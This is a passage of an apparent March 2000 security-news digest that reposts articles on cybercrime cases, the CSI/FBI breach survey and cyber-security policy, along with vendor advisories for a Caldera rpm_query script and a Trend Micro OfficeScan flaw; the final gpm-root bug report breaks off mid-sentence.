76.0 HNS:Mar 24th:FEDERAL CIO NEEDED
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 24 March 2000 on 11:29 AM
Former Senate Year 2000 Committee Chairman Sen. Robert
Bennett, said Thursday that the numerous legislative and agency
efforts to address cyber security may need the guidance of a single
"chief information officer" to coordinate the government's cross
agency and trans-industry security measures.
Link: Computer Currents

http://www.currents.net/newstoday/00/03/24/news16.html

Federal CIO Needed for
Web Security
By Brian Krebs, Newsbytes
March 24, 2000

Former Senate Year 2000 Committee Chairman Sen. Robert
Bennett, R-Utah, said Thursday that the numerous legislative
and agency efforts to address cyber security may need the
guidance of a single "chief information officer" to coordinate the
government's cross agency and trans-industry security
measures.

Speaking at a US Chamber of Commerce meeting, "Cyber
Security: The Real Y2K Challenge," Bennett said that, while it
is up to company CEOs to ensure the security of their own
Web sites, the federal government can and should provide a
overarching structure for that effort. Bennett said the Clinton
administration's Critical Infrastructure Assurance Office (CIAO)
- the agency charged with coordinating the federal government's
cyber security efforts - was a good start, but also highlighted a
need for leadership on the issue.

"Every company has a chief information officer, and I think
eventually the government would need its own CIO, maybe even
at the cabinet level position," Bennett said. "But this is not
going to happen quickly."

Over the past few weeks, a handful of public officials have
called for a federal government CIO to coordinate the
government's many efforts. Last week before the House
Subcommittee on Government Management, Information, and
Technology, Chariman Stephen Horn, R-Calif., pointed to the
government's many security management players and asked
whether there shouldn't be one entity coordinating the
government's efforts.

"Y2K underscored the need for a disciplined management
approach to problem solving," Horn said. "That type of
commitment will be equally important as we turn to the second
technological challenge of the New Year - computer security."
Horn then turned to the witnesses, asking, "Could the Koskinen
model work here?"

At today's meeting, Bennett told reporters that, regardless of
the model Congress ultimately chooses, he has heard from
Koskinen himself on the issue.

"He told me that with regard to the Critical Infrastructure
Protection program: 'You have my very best wishes, but you
will do it without me,'" Bennett said.

Bennet said the responsibility for protecting the confidentiality
and security of corporate information rests squarely on the
shoulders of company CEOs, and those who wait for the
government to step in with legislative remedies will find their
sites hacked and their business secrets revealed.

"This is a CEO and survival issue, not something you leave to
the techies," he said. "The reality is that if somebody decides
they want to break into your company and steal your secrets,
they can do that."

Bennett urged CEOs in attendance to shift to the mode of
urgency and cooperation that made Y2K such a non-event, and
emphasized the need for lawmakers and CEOs to take a
"horizontal" view of their organization and how weaknesses in
their companies' systems can affect other companies on the
network.

"We're not thinking horizontally enough in Congress and
industry," Bennett said. "Nobody's interested in stovepiping: I
don't care if your company is secure or not, but I do care if
you're connected to the Internet."

Bennett said that, given the hectic schedule that Congress is
working at this session, it was likely that few of the many
proposed bills to address cyber security would pass this year.
But, he said, the bills were necessary to keep the dialogue
going.

Reported by Newsbytes.com, http://www.newsbytes.com .

(20000323/WIRES ONLINE, LEGAL, BUSINESS/)

(NEWS)(ASIA)(HKG)(00029)

Arescom Provides DSL For Chunghwa Telecom 03/23/00
HONG KONG, CHINA, 2000 MAR 23 (NB) -- By Staff, IT Daily.
Broadband provider Arescom has recently been awarded a
major business contract for 78,000 digital subscriber lines
(DSL) in partnership with one of Taiwan's wireless service
providers, Tecom.

The contract includes the supply and installation of Arescom's
NetDSL 800 ADSL (asynchronous DSL) modem/bridge and the
NetDSL 1000 IP (Internet Protocol) router.

Implementation is expected to start in May and Arescom is
partnering with Nokia for DSLAM products.

NetDSL 1000 can support up to 253 users through a hub. It has
router capabilities already built in. The NetDSL 800 ADSL
modem provides Internet access and bridging functions through
Ethernet and USB (Universal Serial Bus) interfaces.

Reported by Newsbytes.com




@HWA

77.0 HNS:Mar 24th:DETERRENT SENTENCES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Friday 24 March 2000 on 1:45 AM
Three teenage computer hackers were warned yesterday that they
faced deterrent sentences after they admitted selling login names
and passwords stolen from the Internet in the first case of its kind in
Hong Kong.
Link: SCMP

http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000322020710278.asp


Wednesday, March 22, 2000

Teen hackers face
deterrent sentences

ELAINE PAK LI

Three teenage computer hackers were warned
yesterday that they faced deterrent sentences after they
admitted selling login names and passwords stolen from
the Internet in the first case of its kind in Hong Kong.

One of the trio, a student, was also convicted of
downloading songs from the Internet and selling them
for profit.

At Eastern Court, restaurant manager Tam Hei-lun and
clerk Po Yiu-ming, both 19, and student Mak
King-lam, 18, pleaded guilty to a total of 49 charges.

Magistrate Ian Candy remanded them in custody for
sentencing on April 5, pending reports, and said: "It is
precisely these kind of computer crimes which leave
Internet users in fear and make them pause before
conducting even the most basic of transactions.

"These criminal activities should be nipped in the bud
and a deterrent sentence must be imposed."

All the offences took place between March 1998 and
May last year.

David Leung, prosecuting, told the court Po had hacked
into other Internet users' computers and unlawfully
obtained 127 login names and passwords given to
Internet users when they subscribe to an Internet service
provider for a monthly fee and an hourly rate.

The three defendants knew each other through the
Internet and Po had sold some of his illegally obtained
login names and passwords to Tam for $3,000, but
gave others for free to Mak. Tam later resold them for
$1,500.

The three were aware that the information they obtained
was acquired illegally, the magistrate was told.

Mr Leung said the three defendants had hacked into the
accounts of Internet users of Hongkong Telecom IMS
Netvigator, Vision Network Ltd, City Telecom (HK),
Netfront Information Technology and ABC Net, saving
themselves the monthly fees and causing losses to the
account holders.

Tam admitted 14 counts of obtaining access to a
computer with a view to dishonest gain, Po admitted 12
and Mak two.

Mak also admitted 10 charges of selling pirated discs, in
which he downloaded songs from the Internet and sold
200 discs from his own Web site. Each disc contained
100 songs and was priced at $88.

Tam, who asked buyers of the logins to deposit money
into his bank account, also admitted eight counts of
dealing with property known or reasonably believed to
represent proceeds of an indictable offence.

Po admitted a further three charges of criminally
damaging the computers of three users.


@HWA

78.0 HNS:Mar 23rd:SENSITIVE DATA MADE PUBLIC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 8:32 PM
Consumers who requested online life insurance quotes from the
SelectQuote Web site on Tuesday and Wednesday were apparently
victimized by a software glitch, which caused their personal
information to be left on the company's Web site, wide open.
Link: Security Watch

http://www.securitywatch.com/scripts/news/list.asp?AID=2324


Insurance site exposes sensitive customers' data
(03/23/2000) Consumers who requested online life
insurance quotes from the SelectQuote Web site on Tuesday
and Wednesday were apparently victimized by a software
glitch, which caused their personal information to be left
on the company's Web site, wide open.

The security glitch in the softwareSelectQuote uses, would
have occurred when a form that consumers fill out to request
a quote failed to clear the contents at the end of the process.
This resulted in all personal information (name, address,
current coverage and parents' health histories) from the
previous user being plainly exposed to the next person
requesting a quote.

@HWA

79.0 HNS:Mar 23rd:ALTERING WEB SITES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 5:32 PM
A Gore computer business has beefed up its security after a
Brazilian hacker got into one of the websites and defaced it.
Link: The Press NZ

http://www.press.co.nz/2000/12/000323x04.htm

Hacker breaches security
to alter Alexandra website
text

By Sonia Gerken

A Gore computer business has beefed up its security after a
Brazilian hacker got into one of the websites it manages and
changed the text.

Clive Wilson Computers Gore managing director Ewen
Whitefield said yesterday the security breach of its domain
hosting machine last month was low level, but "anyone hacking
into our machines is serious."

The hacker changed text on the website of an Alexandra client.

Police had been notified of the breach and the company was
unlikely to pursue it further.

"It annoys us more than anything else. If it was a major security
breach we could chase it back to the United States and Brazil,"
Mr Whitefield said.

If anything the breach proved the company's electronic
"firewalls" were pretty good, stopping the hacker from getting
any further than minimal damage, he said.

Website designer Ken France, of Arthurton, said the hacker
probably found a "tiny little hole" to sneak in through.

It was an old site, designed two years ago.

The breach was annoying and nothing serious - "apart from
getting a laugh at our expense," he said.

There was a big rush of "hits" to the site after the first hacker
got in. Within a week 200 hits more than usual were logged
and three or four of those had changed some text, Mr France
said.

"Some even put their telephone number in.

"It was like 'If you want to know how I got in here give me a
call'," he said.

The company was warned about the hacking by a phone call
from someone claiming to be a website watcher in Australia.

Mr France said the call came an hour after he had looked at
the website and it was all right.

"It's quite strange how they knew. I suspect it was bogus."

Mr Whitefield said the company received an e-mail the day
after the hacking from the Brazilian Internet Society asking
questions about the hacker.

There was no way to verify the authenticity of the e-mail, he
said.

Mr France said the company's tighter security had been
affective.

At times he had been unable to get into sites he designed that
were managed by the company.

"It's good in a way. If I can't get in, how will anyone else," he
said.






@HWA

80.0 HNS:Mar 23rd:SECURITY BREACHES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 5:28 PM
More than 90 percent of large corporations and government agencies
were the victims of computer security breaches in 1999, according
to a new survey.
Link: APB News

http://www.apbnews.com/newscenter/internetcrime/2000/03/22/crimesurvey0322_01.html


9 of 10 Companies Report Computer
Attacks
Survey Finds Damages Triple as Cybercrime Booms

March 22, 2000

By David Noack

SAN FRANCISCO (APBnews.com) -- More
than 90 percent of large corporations and
government agencies were the victims of
computer security breaches in 1999,
according to a new survey.

The Computer Security Institute's fifth
Computer Crime and Security Survey also
found that the total reported financial losses
have tripled.

The annual survey is conducted with the participation of the San Francisco
FBI Computer Intrusion Squad and aims to increase awareness of security.
This year's survey was based on responses from 643 computer-security
professionals in U.S. corporations, government agencies, financial
institutions, medical institutions and universities.

Only 42 percent of those answering the survey could put a dollar figure on
their financial losses -- reporting the total at $265 million. The average
annual total over the last three years was $120 million.

Widespread and diverse

Patrice Rapalus, director of the Computer
Security Institute, said the survey points to a
disturbing trend.

"Cybercrimes and other information-security
breaches are widespread and diverse," she
said. "Ninety percent of respondents reported
attacks. Furthermore, such incidents can
result in serious damages. ... Clearly, more
must be done in terms of adherence to sound
practices, deployment of sophisticated
technologies, and most importantly, adequate
staffing and training of information-security
practitioners in both the private sector and
government."

The survey also found:

70 percent reported a variety of serious computer security breaches
other than the most common ones of computer viruses, laptop theft
or employee "net abuse." Other examples included theft of
proprietary information, financial fraud, system penetration from
outsiders, denial of service attacks and sabotage of data or
networks.
74 percent acknowledged financial losses due to computer
breaches.
71 percent of respondents detected unauthorized access by
insiders. For the third year in a row, more respondents -- 59 percent
-- cited their Internet connection as a frequent point of attack rather
than their internal systems -- 38 percent -- as a frequent point of
attack.

Financial losses larger

The report said the financial losses in eight of 12 categories were larger
than in any previous year. In addition, financial losses in four categories
were higher than the combined total of the three previous years. For
example, 61 respondents quantified losses due to sabotage of data or
networks for a total of $27 million. The total financial losses due to
sabotage for the previous years combined totaled only $10 million.

As in previous years, the most serious financial losses occurred through
theft of proprietary information, with 66 respondents reporting losses of $66
million and financial fraud and 53 reporting $55 million in losses.

The survey results show that computer crime threats to large corporations
and government agencies come from both inside and outside their
electronic perimeters, confirming trends found in prior surveys.

Bruce J. Gephardt heads the FBI's Northern California office in San
Francisco, which covers 15 counties, including Silicon Valley. He said the
survey helps him decide how to deploy his forces instead of reacting to
computer crises as they occur.

Trends and crises

"The results of the CSI/FBI survey provide us with valuable data," Gephardt
said. "This information not only has been shared with Congress to
underscore the need for additional investigative resources on a national
level, but [it] identifies emerging crime trends and helps me decide how
best to proactively and aggressively assign resources before those 'trends'
become 'crises.'"

CSI, which was established in 1974, is a San Francisco-based association
of information-security professionals.

The FBI, responding to an increase in the criminal targeting of major
components of information and economic infrastructure systems, has
established the National Infrastructure Protection Center (NIPC), which is
located at FBI headquarters, and the Regional Computer Intrusion Squads,
which are located in selected offices throughout the United States.

The NIPC, a joint partnership among federal agencies and private industry,
is designed to serve as the government's lead mechanism for preventing
and responding to cyberattacks on the nation's infrastructure. The Regional
Computer Intrusion Squads investigate violations of the Computer Fraud
and Abuse Act, which includes intrusions to public switched networks,
major computer network intrusions, privacy violations, industrial espionage,
pirated computer software and other crimes.

David Noack is an APBnews.com staff writer (david.noack@apbnews.com).

@HWA

81.0 HNS:Mar 23rd:ATTACK COSTS RISE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ Thursday 23 March 2000 on 3:29 PM
In an annual survey issued on Wednesday, the FBI and the San
Francisco-based Computer Security Institute showed just how
pressing: total verifiable losses in 1999 more than doubled to up to
top $265 million, while more than 90 percent of respondents reported
detecting some form of security breach.
Link: CNNfn

http://cnnfn.com/2000/03/22/technology/wires/hackers_losses_wg/


Hacker attack costs rise
FBI, CSI: Verifiable losses due to poor
security top $265M in 1999
March 22, 2000: 7:30 a.m. ET


SAN FRANCISCO (Reuters) - In a year that saw some of the Internet's best
known sites seriously hit by hacker attacks, few computer users would
question that cyber-security is a pressing concern.
In an annual survey issued on Wednesday, the FBI and the San
Francisco-based Computer Security Institute showed just how pressing: total
verifiable losses in 1999 more than doubled to up to top $265 million, while
more than 90 percent of respondents reported detecting some form of security
breach.
Security experts say a large number of attacks go unrecognized, and the
total is hard to assess, with companies reluctant to admit they've been
vandalized. But the annual survey gives a clear picture of a worsening problem.
"The trends are continuing in the same direction. It's going from bad to
worse in terms of threats from the outside, while the threat from the inside
doesn't go away," said Richard Power, CSI's editorial director.
The fifth annual survey of computer crime and security polled some 640
corporations, banks and government organizations about the state of their
computer systems.
Only 42 percent of these respondents could put a dollar figure on what the
attacks cost them -- but this figure, at $265 million, was more than double the
average annual total over the last three years.
While the most common threats -- computer viruses, laptop theft, or
employee "net abuse" -- continued apace, at least 74 percent of respondents
reported more serious security breaches including theft of proprietary
information, financial fraud, system penetration by outsiders, data or network
sabotage, or "denial of service" attacks designed to take websites out of
commission.
Information theft and financial fraud caused the most severe financial
losses, put at $68 million and $56 million respectively.
But "denial of service" attacks, like the ones that temporarily paralyzed
Yahoo!, eBay, Buy.com, and several other websites in February, are also a
growing problem, Powers said.
Losses traced to denial of service attacks were only $77,000 in 1998, and
by 1999 had risen to just $116,250. The new survey, which reports on numbers
taken before the high-profile February strikes, showed quantified losses up at
more than $8.2 million.
"The denial of service showed that many sites are way, way understaffed
and not adequately secured," Powers said.
"Maybe a half a dozen sites were attacked in that attack, and 150 sites
were hacked into to launch the attack. There is a widespread insecurity among
corporate sites and government sites and the problem is not just technological,
it is human. There are not enough people working on it."
Bruce Gephardt, in charge of the Federal Bureau of Investigation's northern
California office, said the survey revealed how quickly computer security is
becoming a major problem faced by law enforcement, and how more staff was
needed to fight it.
"If the FBI and other law enforcement agencies are to be successful in
combating this continually increasing problem, we cannot always be placed in
a reactive mode, responding to computer crises as they happen," Gephardt
said in a news release.

@HWA

82.0 HNS:Mar 23rd:INDICTED FOR HACKING NASA SERVERS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 3:28 PM
A suspected computer hacker made his first court appearance
Wednesday after being indicted on charges of breaking into
computers belonging to NASA and the U.S. departments of energy,
defense and transportation, said federal prosecutors.
Link: Miami Herald

http://www.herald.com/content/today/business/brkdocs/079991.htm



Posted at 11:58 p.m. EST Wednesday, March 22, 2000

Man indicted after allegedly hacking into
government computers

SAN FRANCISCO -- (AP) -- A suspected computer hacker made his first court
appearance Wednesday after being indicted on charges of breaking into
computers belonging to NASA and the U.S. departments of energy, defense and
transportation, said federal prosecutors.

Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during the
hearing in San Jose. On March 15, he was indicted on 15 criminal counts,
including unauthorized access of a computer, recklessly causing damage and
interception of electronic communication.

All the counts carry sentences of at least six months and fines of hundreds of
thousands of dollars.

Butler, who also goes by the name of Max Vision, had been an FBI source,
helping agents solve computer crimes, authorities said. He turned himself in on
Tuesday.

Butler's attorney did not return a telephone call seeking comment.

@HWA

83.0 HNS:Mar 23rd:CALDERA SYSTEMS SECURITY ADVISORY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by LogError Thursday 23 March 2000 on 12:19 PM
The OpenLinux package contains a CGI script called rpm_query that
allows a user to obtain a list of all RPM packages installed on that
machine, provided the Apache Web server is running. This could be
used by an intruder to determine what part of the system to attack.
Link: Linux Today

http://linuxtoday.com/stories/18850.html

Caldera Systems Security Advisory: rpm_query allows everyone to list installed rpms
Mar 22, 2000, 23:23 UTC (0 Talkbacks)

Caldera Systems, Inc. Security Advisory

Subject: rpm_query allows everyone to list installed rpms
Advisory number: CSSA-2000-007.1
Issue date: 2000 March, 8
Last change: 2000 March, 14
Cross reference:


1. Problem Description

The OpenLinux package contains a CGI script called rpm_query that allows
a user to obtain a list of all RPM packages installed on that machine,
provided the Apache Web server is running.

This could be used by an intruder to determine what part of the system
to attack.

2. Vulnerable Versions

System Package
-----------------------------------------------------------
OpenLinux Desktop 2.3 All packages previous to
OpenLinux-2.3-17

OpenLinux eServer 2.3 All packages previous to
OpenLinux-2.3-24S

3. Solution

Workaround:

Remove the script by executing:

rm -f /home/httpd/cgi-bin/rpm_query

The proper solution is to upgrade to the latest packages

4. OpenLinux Desktop 2.3

4.1 Location of Fixed Packages

The upgrade packages can be found on Caldera's FTP site at:

ftp://ftp.calderasystems.com/pub/openlinux/updates/2.3/current/RPMS


@HWA

84.0 HNS:Mar 23rd:REMOTE SECURITY MANAGEMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by LogError Thursday 23 March 2000 on 12:14 PM
Businesses can have their network security hosted and managed
remotely using a new service from Network Associates. The
company's myCIO.com service offers an ASP 'infrastructure' which
allows partners such as ISPs, telecoms providers and even
computer resellers to host NAI's products and services online.
Link: VNUNET

http://www.vnunet.com/News/601120



@HWA

85.0 HNS:Mar 23rd:"ANTI-ARAB" BUG
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 3:29 AM
The head of Microsoft's European and Middle East operations said
on Wednesday the firm was fixing a bug in its Windows 2000
French-language spell-checker which suggested replacing
"anti-stress" with the word "anti-arab."
Link: Wired

http://www.wired.com/news/politics/0,1283,35117,00.html

MS Fixing 'Anti-Arab' Bug
Reuters

7:00 a.m. Mar. 22, 2000 PST


PARIS -- The head of Microsoft's European and Middle East operations said
on Wednesday the firm was fixing a bug in its Windows 2000
French-language spell-checker which suggested replacing "anti-stress"
with the word "anti-arab."

Michel Lacombe, president of Microsoft EMEA, said the problem should be
fixed in "a few weeks" and that customers would be offered a new version
free of charge.

"Microsoft is very sorry about this. We are always sensitive to things
which confuse people and we are very respectful of people getting hurt,"
Lacombe told Reuters.

"Microsoft has no problem with the Arab world, we invest in the Arab
language, and in Arab countries. Our software developers are looking at a
way to fix this and in a few weeks this will be behind us," he added.

France's national CFDT trade union denounced Microsoft for its "racist
turn of phrase."

"As it is not able itself to go directly to court, the CFDT is informing
national anti-racism societies. It will support any criminal action they
should take," the CFDT said in a statement.

Lacombe noted that the bug was in its spell-checker, not its thesaurus.

"That would be worse. We are not trying to give a synonym of anti-stress,
just to help the user solve a spelling problem," he said.


@HWA

86.0 HNS:Mar 23rd:OFFICE 2000 PATCHES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 3:28 AM
Microsoft posted Service Release 1 (SR-1) to the Web for download.
It is the first collection of patches and fixes for Office 2000 since the
product began shipping last June.
Link: Microsoft

http://officeupdate.microsoft.com/default.asp

@HWA

87.0 HNS:Mar 23rd:SHARING INFORMATION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 3:16 AM
A new bill aimed at encouraging companies to share information
about hacker attacks would provide firms with a limited exemption
from the Freedom of Information Act.
Link: NewsBytes

http://www.newsbytes.com/pubNews/00/146086.html

Bill Would Protect Firms That Share Hacking Info


By David McGuire, Newsbytes WASHINGTON, DC, U.S.A., 21 Mar 2000, 6:00 AM
CST

A new bill aimed at encouraging companies to share information about
hacker attacks would provide firms with a limited exemption from the
Freedom of Information Act (FOIA).

Set to be introduced by Reps. Tom Davis, R-Va. and Jim Moran, D-Va.,
later this week, the legislation would allow companies to share
information about cyberattacks with law enforcers and industry groups,
without worrying that such information could come back to haunt them,
Davis staffer David Marin said today.

"The public interest will be served by companies coming forth to share
their information" about attacks, Marin said. Too often now companies do
not report cyberattacks for fear that such reports will find their way
into the media, he said.

While the bill would create a limited shelter under FOIA, it is not
intended to allow companies to mask their business dealings, Marin said.

When the legislation is completed it will be "narrowly tailored to
address (information pertaining to) how the attack was done and what was
done to fix the attack," Marin said. The legislation will apply only to
telecommunications and information technology infrastructure attacks.

Used primarily by the media, FOIA allows members of the press and the
public to file legally binding requests for public documents.

FOIA already contains an exemption for ongoing criminal investigations,
by Davis and Moran are aiming to further protect firms that divulge
information about cyberattacks, Marin said.

Reported by Newsbytes.com, http://www.newsbytes.com .



@HWA

88.0 HNS:Mar 23rd:MONITORING WITH GOOD RESULTS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 2:31 AM
A federal appeals court has upheld a CIA policy allowing agency
officials to monitor employees' Internet use. The policy had helped
convict a federal employee of downloading child pornography on
government time.
Link: GovExec article

http://www.govexec.com/dailyfed/0300/032000m1.htm

Link: US vs. Simons - court's decision

http://www.law.emory.edu/4circuit/feb2000/994238.p.html


GovExec;

March 20, 2000

DAILY BRIEFING

Court upholds agency reviews of
employees' Internet use

By Kellie Lunney
klunney@govexec.com

A federal appeals court has upheld a CIA policy allowing
agency officials to monitor employees' Internet use. The policy
had helped convict a federal employee of downloading child
pornography on government time.

The CIA's Foreign Broadcast Information Service
implemented a policy in June 1998 authorizing "electronic
audits" of employee computers in order to crack down on
non-business related Internet use. Those audits included
reviewing employees' e-mail messages and collecting
information on their Web site visits.

Later that summer, Science Applications International Corp.
(SAIC), which had a contract to manage FBIS' computer
network and monitor inappropriate Internet behavior, alerted
the agency when the keyword "sex" turned up numerous hits in
a firewall database during a routine test. The hits originated
from the computer of Mark L. Simons, an electronic engineer
at FBIS.

FBIS officials then searched Simons' computer and office on
four occasions, eventually compiling enough evidence to indict
him on two counts of knowingly receiving and possessing child
pornography downloaded from the Internet and stored on his
government hard drive.

Simons claimed that his Fourth Amendment rights had been
violated during the searches. But a district court upheld the
searches. Simons was found guilty and was sentenced to 18
months in jail.

The U.S. Court of Appeals for the Fourth Circuit affirmed that
decision in late February, saying that Simons failed to prove
that he had a "legitimate expectation of privacy in the place
searched or the item seized."

According to the appeals court, "In the final analysis, this case
involves an employee's supervisor entering the employee's
government office and retrieving a piece of government
equipment in which the employee had absolutely no
expectation of privacy [due to the agency's Internet
policy]—equipment that the employer knew contained
evidence of crimes committed by the employee in the
employee's office ... Here, there was a conjunction of the
conduct that violated the employer's policy and the conduct
that violated the criminal law."

The court's decision in USA v. Simons (99-4238) is online at
www.law.emory.edu/4circuit/feb2000/994238.p.html.



@HWA

89.0 HNS:Mar 23rd:CRIME FIGHTING LAB
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 2:15 AM
With an eye toward cracking down on cyber crime, officials at the
College of DuPage on Monday unveiled a new state-of-the-art
computer lab at the college's Suburban Law Enforcement Academy.
Link: Chicago Tribune

http://www.chicagotribune.com/news/metro/dupage/printedition/article/0,2669,SAV-0003210202,FF.html


FIGHTING CRIME ON
COMPUTER
LAB GIFTS LET COLLEGE OFFER CLASS
FULL-TIME

By LeAnn Spencer
Tribune Staff Writer
March 21, 2000

With an eye toward cracking down on cyber crime,
officials at the College of DuPage on Monday unveiled a
new state-of-the-art computer lab at the college's
Suburban Law Enforcement Academy.

There, officers will learn how to track computer criminals,
from pedophiles who prey on children to shysters out to
bilk people of money to hackers who infiltrate confidential
Web sites.

The lab at the Glen Ellyn school also will train officers in
how to conduct on-line investigations, in computer
modeling that will enable them to reconstruct a crime
scene, and in how to present the evidence in court.

The new lab was made possible by a donation from
Microsoft Corp. and Omni Tech Corp. of 51 new
personal computers, screens and keyboards; a printer and
overhead projector; all the necessary software; and
technical support services.

The equipment and software are valued at $250,000,
college officials said, and enable the college to create one
of the nation's few specialized computer crime labs
dedicated to training law enforcement personnel. No
civilians will be able to enroll in the 40-hour, weeklong
classes, which will cost $475 in tuition.

"The industry is very motivated in learning how to tackle
the problems" of computer crime, Bob Herbold, executive
vice president and chief operating officer of Microsoft,
said at a Monday unveiling of the lab.

Until now, the law-enforcement academy has held its
computer crime classes by borrowing computer space
elsewhere on campus, and only when regular classes
were out of session. The new computer lab allows the
academy to offer classes virtually year-round, reaching
literally hundreds of officers and prosecutors.

Already, the academy is receiving attention from police
departments all over the country, as well as Canada,
officials said.

College officials said that there is a real need for the
training as police and prosecutors struggle to keep pace
with the sometimes confusing world of computer crime.

"When this was brand-new technology, it was difficult for
police departments to follow up," said Mike Sullivan,
Naperville police detective and an instructor at the law
enforcement academy.

But understanding the inner workings of computers and
the Internet, officials said, is no different than learning any
kind of new technology, whether it be fingerprinting or the
use of DNA evidence.

One unusual aspect of the lab will be that the police
officers in the class will be able to pose as children and
log on to pornographic Web sites or chat rooms where
Internet users prey on the young. As pedophiles reveal
themselves, they can be investigated and arrested,
officials said.

"It used to be that pedophiles would go to the park and
pick their victims," Sullivan said. "As the Internet came
along, the Internet has become the virtual park."

Such real-life training is invaluable.

"There's no place else that you can go in and see a felony
being committed while you are doing police training,"
Sullivan said.

Sullivan noted that many people wrongly think what they
do on the Internet cannot be traced.

"When a crime is committed on the Internet, it makes it
easier for us to track you. It's like committing a crime and
then leaving your license plate at the scene," he said.

"You can't go on the Internet," he said, "without leaving a
footprint."



@HWA

90.0 HNS:Mar 23rd:HUNTING CROATIAN PIRATES
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

by BHZ Thursday 23 March 2000 on 1:49 AM
Three days ago, first coordinated police action against software
pirates in Croatia resulted with confiscation of more than 47
computers, 8536 CD's, 2602 floppy disks and nearly $1 million worth
of software.
Link: Bug On-line (Croatian language)

http://www.bug.hr/vijesti/index.asp?datum=22032000#id3268

@HWA

91.0 HNS:Patch available for OfficeScan vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 24, 2000
Trend Micro has released a patch that eliminates server security
vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier
versions, running on Windows NT 4 server with Internet Information
Server(IIS). ...

Patch available for OfficeScan vulnerability
Posted to BugTraq on March 24, 2000

Security Focus BugTraq ID: 1057

Posted: March 22, 2000

Summary
=======
Trend Micro has released a patch that eliminates server security
vulnerabilities found on OfficeScan Corporate Edition 3.51 or earlier
versions, running on Windows NT 4 server with Internet Information
Server (IIS). These versions of OfficeScan allow intruders within a
firewall to invoke OfficeScan CGIs on the server without
authentication - bypassing OfficeScan management console
password protection. These OfficeScan CGIs are intended for
administrator to manage OfficeScan antivirus running on networked
workstations via the OfficeScan management console. By gaining
access to execute these CGIs, hackers can use them to change
OfficeScan antivirus configurations or to uninstall OfficeScan
antivirus on thedesktops.

Issues
======
Trend OfficeScan version 3.51 or earlier versions apply inadequate
security settings on the OfficeScan server CGI components. If a
malicious user, has the ability to connect to the OfficeScan server
via a web browser, these CGIs can be executed to send valid
commands - including uninstall command - to OfficeScan clients. In
addition, OfficeScan's implementation of user authentication in its
management console - password protection - was insufficiently
encrypted, and allows a malicious user to decrypt and gain access
to the OfficeScan management console.

Implementation
==============
Trend Micro has released a patch that will secure access to the
OfficeScan CGIs on the server. The patch program changes the file
permissions on the OfficeScan CGIs, so only administrators can
access and execute them. This patch works only on drives
formatted to use Windows NT file system (NTFS). After applying this
patch, hackers will no longer be able to remotely invoke OfficeScan
CGIs without being authenticated as a administrator by NTFS
security. This patch also prevents hackers, who sniffs for OfficeScan
management console password over the network, from gaining
access to the OfficeScan management console. Access to the
OfficeScan management console or to execute OfficeScan CGIs
now requires NTFS authentication.

Affected Software Versions
==========================
Trend OfficeScan Corporate Edition 3.0
Trend OfficeScan Corporate Edition 3.11
Trend OfficeScan Corporate Edition 3.13
Trend OfficeScan Corporate Edition 3.50
Trend OfficeScan Corporate Edition 3.51
Trend OfficeScan for Microsoft SBS 4.5

This vulnerability is only present when the above software version is
installed on a Windows NT server with IIS. It is not present when the
above software version is installed on Novell NetWare servers or
Windows NT server without IIS.

Patch Availability
==================
OfficeScan Unauthenticated CGI Usage patch can be downloaded
from:

http://www.antivirus.com/download/ofce_patch.htm

More Information
================
Please see the following references for more information related to
this issue.
- Trend Micro Security Bulletin:
http://www.antivirus.com/download/ofce_patch_351.htm
- Frequently Asked Questions: Trend Micro Knowledge Base
http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8

Obtaining Support on this Issue
===============================
This is a fully supported patch. Information on contacting Trend
MicroTechnical Support is available at
http://www.trend.com/support/default.htm

Acknowledgements
================
Trend Micro thanks Gregory Duchemin
http://www.securite-internet.com and Elias Levy
http://www.securityfocus.com for reporting the OfficeScan server
vulnerability to us, and working with us to protect our customers



@HWA


92.0 HNS:Gpm-root problems
~~~~~~~~~~~~~~~~~~~~~

From HNS http://www.net-security.org/

Posted @ March 23, 2000
When the user selects one of his/her favourite utility from his/her
own list, gpm-root starts this process with the group and
supplementary groups of the gpm-root daemon ...

Gpm-root problems
Posted to BugTraq on March 23, 2000

I've sent report about the following security hole to the authors of
gpm, but they seemed to ignore the problem. The problem applies to
every gpm version known by me, for example 1.18.1 and 1.19.0.

To exploit this problem, gpm-root must be running on a machine and
the user needs both login to that machine and physical access to
the keyboard and mouse.



gpm-root is a beautiful tool shipped in the gpm package. It pops up
beautiful menus based on each user's own config file when
Ctrl+Mousebutton is pressed on the console.

When the user selects one of his/her favourite utility from his/her
